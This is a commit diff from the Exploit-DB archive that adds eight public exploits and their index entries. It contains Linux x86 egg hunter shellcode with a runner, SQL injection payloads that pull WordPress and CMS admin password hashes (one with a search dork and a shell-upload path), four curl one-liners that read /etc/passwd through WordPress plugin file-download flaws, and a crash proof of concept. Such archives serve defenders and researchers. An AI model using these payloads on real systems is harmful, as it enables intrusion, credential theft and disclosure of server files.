DB: 2015-08-11

8 new exploits
This commit is contained in:
Offensive Security 2015-08-11 05:02:51 +00:00
parent b6cfc9b565
commit 6bd95eb0eb
9 changed files with 278 additions and 0 deletions

View file

@ -34034,6 +34034,8 @@ id,file,description,date,author,platform,type,port
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
@ -34062,7 +34064,13 @@ id,file,description,date,author,platform,type,port
37732,platforms/win32/local/37732.c,"Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
37747,platforms/windows/dos/37747.py,"Havij Pro - Crash POC",2015-08-10,i_7e1,windows,dos,0
37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031
37741,platforms/osx/dos/37741.txt,"OSX Keychain - EXC_BAD_ACCESS DoS",2015-08-08,"Juan Sacco",osx,dos,0
37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0
37744,platforms/php/webapps/37744.txt,"WordPress Video Gallery 2.7 SQL Injection",2015-08-09,"Kacper Szurek",php,webapps,0
37749,platforms/lin_x86/shellcode/37749.c,"Linux x86 Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80

Can't render this file because it is too large.

View file

@ -0,0 +1,63 @@
/*
Title: Linux x86 Egg Hunter Shellcode (19 bytes)
Date: 4 August 2015
Author: Guillaume Kaddouch
Website: http://networkfilter.blogspot.com
Twitter: @gkweb76
Tested on: Ubuntu 14.04.2 LTS x86, Kali Linux 1.0.9 x86
This code was created as an exercise for the SecurityTube Linux Assembly Expert (SLAE).
Egg signature = 0x50905090 (push eax, nop, push eax, nop)
Usually egg hunters use a 2 * 4 bytes (8 bytes) egg because the first address check could match the hardcoded egg signature in
the egg hunter itself. As we do not store hardcoded egg signature below, it allows us to check only 4 bytes once.
egg-hunter.asm:
----------------
global _start
section .text
_start:
mov eax, addr ; retrieve a valid address (shorter than using JMP CALL POP)
mov ebx, dword 0x5090508f ; egg signature altered: 0x50905090 - 1
inc ebx ; fix egg signature in ebx (the purpose is to not store the hardcoded egg signature)
next_addr:
inc eax ; increasing memory address to look at next address
cmp dword [eax], ebx ; check if our egg is at that memory address, if yes set ZF = 1
jne next_addr ; if ZF = 0 (check failed), then jump to next_addr to check next address
jmp eax ; we found our egg (ZF = 1), jump at this address
addr: db 0x1
*/
/*
myegg.c:
-----------
Compile with: gcc -fno-stack-protector -z execstack myegg.c -o myegg
*/
#include<stdio.h>
#include<string.h>
// Egg hunter 19 bytes (\x00 \x0a \x0d free)
unsigned char egghunter[] = \
"\xb8\x72\x80\x04\x08\xbb\x8f\x50\x90\x50\x43\x40\x39\x18\x75"
"\xfb\xff\xe0\x01";
// Print 'Egg Found!!' on screen
// You can swap it out with any shellcode you like (as long as you keep the egg mark)
unsigned char shellcode[] = \
"\x90\x50\x90\x50" // egg mark
"\xeb\x16\x59\x31\xc0\x50\xb0\x04\x31\xdb\xb3\x01\x31\xd2\xb2"
"\x0c\xcd\x80\x31\xc0\xb0\x01\xcd\x80\xe8\xe5\xff\xff\xff\x45"
"\x67\x67\x20\x46\x6f\x75\x6e\x64\x21\x21\x0a";
main()
{
printf("Egg hunter shellcode Length: %d\n", strlen(egghunter));
int (*ret)() = (int(*)())egghunter;
ret();
}

37
platforms/php/webapps/37744.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: WordPress Video Gallery 2.7 SQL Injection
# Date: 20-01-2015
# Software Link: https://wordpress.org/plugins/contus-video-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
$_GET['vid'] is not escaped.
google_adsense() is accessible for everyone.
File: contus-video-gallery\hdflvvideoshare.php
add_action('wp_ajax_googleadsense' ,'google_adsense');
add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
function google_adsense(){
global $wpdb;
$vid = $_GET['vid'];
$google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
$query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
$google_adsense = unserialize($query);
echo $google_adsense['googleadsense_code'];
die();
}
http://security.szurek.pl/wordpress-video-gallery-27-sql-injection.html
2. Proof of Concept
http://wordpress-url/wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(48, 32, 85, 78, 73, 79, 78, 32, 83, 69, 76, 69, 67, 84, 32, 67, 79, 78, 67, 65, 84, 40, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 57, 55, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 56, 44, 32, 49, 50, 51, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 57, 44, 32, 53, 54, 44, 32, 53, 56, 44, 32, 51, 52, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 49, 49, 49, 44, 32, 49, 48, 51, 44, 32, 49, 48, 56, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 53, 44, 32, 49, 48, 49, 44, 32, 57, 53, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 51, 52, 44, 32, 53, 57, 44, 32, 49, 49, 53, 44, 32, 53, 56, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 76, 69, 78, 71, 84, 72, 40, 117, 115, 101, 114, 95, 112, 97, 115, 115, 41, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 53, 56, 44, 32, 51, 52, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 44, 32, 117, 115, 101, 114, 95, 112, 97, 115, 115, 44, 32, 67, 65, 83, 84, 40, 67, 72, 65, 82, 40, 51, 52, 44, 32, 53, 57, 44, 32, 49, 50, 53, 41, 32, 97, 115, 32, 67, 72, 65, 82, 41, 41, 32, 70, 82, 79, 77, 32, 119, 112, 95, 117, 115, 101, 114, 115, 32, 87, 72, 69, 82, 69, 32, 73, 68, 32, 61, 32, 49) as CHAR)
3. Solution:
Update to version 2.8

21
platforms/php/webapps/37750.txt Executable file
View file

@ -0,0 +1,21 @@
# ( In The Name Of ALLAH )
# Exploit Title : WDS CMS - SQL Injection
# Google Dork : allinurl:wds_news/article.php?ID=
# Date : 2015-08-09
# Exploit Author : Ismail Marzouk
# Vendor Homepage : http://webdesignskolan.se/
# Tested on : Windows 7
Exploit : http://
[Target]/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cms_admin--
Upload Shell : http://[Target]/wds_news/admin.php?mode=list_file
Shell Path : http://[Target]/wds_news/filer/shell.php
# #### #### #### #### #### #### #### #### #
# Facebook Profile : www.fb.com/ism.marzouk
# #### #### #### #### #### #### #### #### #
Good Luck ^__^

24
platforms/php/webapps/37751.txt Executable file
View file

@ -0,0 +1,24 @@
Title: Remote file download vulnerability in wptf-image-gallery v1.03
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-17
Download Site: https://wordpress.org/plugins/wptf-image-gallery
Vendor: https://profiles.wordpress.org/sakush100/
Vendor Notified: 0000-00-00
Vendor Contact: plugins@wordpress.org
Description: WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it.
Vulnerability:
The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files:
1 <?php
2 error_reporting(0);
3 $homepage = file_get_contents($_GET['url']);
4 $homepage = str_replace("script", "mboxdisablescript", $homepage);
5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage);
6 echo $homepage;
7 ?>
CVEID:
OSVDB:
Exploit Code:
• $ curl http://server/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd

31
platforms/php/webapps/37752.txt Executable file
View file

@ -0,0 +1,31 @@
Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-13
Download Site: https://wordpress.org/plugins/recent-backups
Vendor: https://profiles.wordpress.org/andycheeseman/
Vendor Notified: 0000-00-00
Vendor Contact: plugins@wordpress.org
Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
Vulnerability:
The code in download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded. This vulnerability can be used
to download sensitive system files:
2 $file = $_GET['file_link'];
3
4 if (file_exists($file)) {
5 header('Content-Description: File Transfer');
6 header('Content-Type: application/octet-stream');
7 header('Content-Disposition: attachment; filename='.basename($file));
8 header('Content-Transfer-Encoding: binary');
9 header('Expires: 0');
10 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
11 header('Pragma: public');
12 header('Content-Length: ' . filesize($file));
13 ob_clean();
14 flush();
15 readfile($file);
CVEID:
OSVDB:
Exploit Code:
• $ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd

43
platforms/php/webapps/37753.txt Executable file
View file

@ -0,0 +1,43 @@
Title: Remote file download in simple-image-manipulator v1.0 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-16
Download Site: https://wordpress.org/plugins/simple-image-manipulator
Vendor: https://profiles.wordpress.org/kevartpatel/
Vendor Notified: 2015-07-16
Vendor Contact: plugins@wordpress.org
Description: Manipulate your wordpress images using slider and tickboxes.
Vulnerability:
In ./simple-image-manipulator/controller/download.php no checks are made to authenticate user or sanitize input when determining file location:
14 /* Figure out the MIME type | Check in array */
15 $known_mime_types=array(
16 "pdf" => "application/pdf",
17 "txt" => "text/plain",
18 "html" => "text/html",
19 "htm" => "text/html",
20 "exe" => "application/octet-stream",
21 "zip" => "application/zip",
22 "doc" => "application/msword",
23 "xls" => "application/vnd.ms-excel",
24 "ppt" => "application/vnd.ms-powerpoint",
25 "gif" => "image/gif",
26 "png" => "image/png",
27 "jpeg"=> "image/jpg",
28 "jpg" => "image/jpg",
29 "php" => "text/plain"
30 );
31
32 if($mime_type==''){
33 $file_extension = strtolower(substr(strrchr($file,"."),1));
34 if(array_key_exists($file_extension, $known_mime_types)){
35 $mime_type=$known_mime_types[$file_extension];
36 } else {
37 $mime_type="application/force-download";
38 };
39 };
CVEID:
OSVDB:
Exploit Code:
• curl -sk "http://server/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"

34
platforms/php/webapps/37754.txt Executable file
View file

@ -0,0 +1,34 @@
Title: Remote file download vulnerability in candidate-application-form v1.0 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-12
Download Site: https://wordpress.org/plugins/candidate-application-form
Vendor: https://profiles.wordpress.org/flaxlandsconsulting/
Vendor Notified: 2015-07-12
Vendor Contact:
Description: This plugin allows you to easily add a candidate application form to a job vacancy post, which allows the candidate to apply for the vacancy.
Vulnerability:
The code in downloadpdffile.php doesn't do any sanity checks, allowing a remote attacker to download sensitive system files:
<?php
2 $file_name = $_GET["fileName"];
3 $path = $_GET["fileUrl"];
4 $fullfile = $path.$file_name;
5 if (file_exists('../../uploads/candidate_application_form/'.$file_name)) {
6 header('Pragma: public'); // required
7 header('Expires: 0'); // no cache
8 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
9 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ('../../uploads/candidate_application_form/'.$file_ name)).' GMT');
10 header('Cache-Control: private',false);
11 header('Content-Type: '.'application/pdf');
12 header('Content-Disposition: attachment; filename="'.basename('../../uploads/candidate_application_form/'.$file_ name).'"');
13 header('Content-Transfer-Encoding: binary');
14 header('Content-Length: '.filesize('../../uploads/candidate_application_form/'.$file_name)); // provide file size
15 header('Connection: close');
16 readfile('../../uploads/candidate_application_form/'.$file_name); // push it out
17 exit();
18 }
CVEID:
OSVDB:
Exploit Code:
• $ curl http://server/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd

17
platforms/windows/dos/37747.py Executable file
View file

@ -0,0 +1,17 @@
#!/usr/bin/env python
#Exploit Title:Havij Pro Crash POC
# Tested:windows7
#Sofrware Link:http://www.itsecteam.com/
#Version:1.17
#Email:i_7e1@outlook.com
#Author:M1x7e1@Safeye Team
#run python poc.py
#copy content to target
#click Analyze
## EDB-Note: tested and verified using version 1.6 Pro
content = \x41 * 8000
file = open(xx.txt,w)
file.write(content)
file.close()